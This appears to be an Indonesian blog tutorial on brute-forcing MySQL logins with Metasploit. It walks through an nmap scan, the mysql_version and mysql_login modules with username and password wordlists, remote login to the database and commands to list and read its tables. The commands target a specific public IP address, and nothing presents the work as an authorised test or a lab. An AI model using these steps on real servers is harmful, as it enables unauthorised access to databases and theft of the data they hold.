Metasploit adalah alat serba guna yang sangat mendukung untuk melakukan exploitasi, seperti pada artikel ini saya akan membagikan tips exploitasi database dengan cara melakukan Brute Force pada MySQL dengan menggunakan Metasploit. Namun sebelum lanjut pastikan dulu kalian sudah menginstall metasploit di terminal silahkan download di url berikut ini jika belum menginstall metasploit https://www.metasploit.com.
Selain itu kalian juga membutuhkan tools Information Gathering seperti NMAP untuk melakukan port scanning sbelum melakukan Brute Force MySQL, Nmap sendiri memiliki banyak sekali fungsi bukan hanya sekedar untuk melakukan port scanning.
Pertama silahkan kalian buka nmap untuk melakukan port scanning, apakah terdapat service mysql yang berjalan pada server target atau tidak.
nmap website.com
Dalam gambar di atas terlihat jika port mysql 3306, kemudian kita lanjut jalankan metasploit dengan command berikut ini.
sudo msfconsole
use mysql_version
set RHOSTS 103.78.73.108
run
Kemudian seting juga module mysql_login untuk melakukan brute force terhadap mysql target dengan command berikut ini.
use mysql_login
set RHOSTS 103.78.73.108
set USERNAME root
Di bagian USERNAME kalian juga bisa menggunakan list username yang sudah kalian buat, atau memasukan username seperti di atas root atau yang lainnya. jika anda ingin menggunakan wordlist username maka seting dengan command berikut ini.
set USER_FILE /home/zidan/userlist.txt
Ganti /home/zidan/userlist.txt dengan lokasi user list kalian.
set PASS_FILE /home/zidan/passlist.txt
Ganti /home/zidan/passlist.txt dengan lokasi list password kalian.
Kemudian jalankan module dengan command di bawah ini.
run
Tunggu hingga metasploit melakukan tugasnya, jika success module akan otomatis berhenti dan menampilkan username dan juga password mysql. berikut ini gambaran contoh dari hasilnya.
Jika sudah mendapatkan username dan juga password mysql target sekarang tinggal kita lakukan remote mysql dari jarak jauh, namun jika kalian sudah mendapatkan halamn login mysql nya bagian ini di skip aja.
telnet ip 3306
mysql -u username -h 103.78.73.108 -p
kemudian jika remote mysql berhasil, hasilnya akan terlihat seperti pada gambar di bawah ini.
Jika seperti ini tinggal kalian oprek aja databasenya, atau jika kalian belum terlalu menguasai command mysql bisa saya bantu dengan beberapa command dasar di bawah ini.
show databases;
Command ini di gunakan untuk melihat nama database
use namadatabase
Command untuk masuk ke dalam database
show tables;
Digunakan untuk melihat nana tables yang ada di dalam batabase
select * from nama_columns;
Digunakan untuk melihat isi dari dalam columns database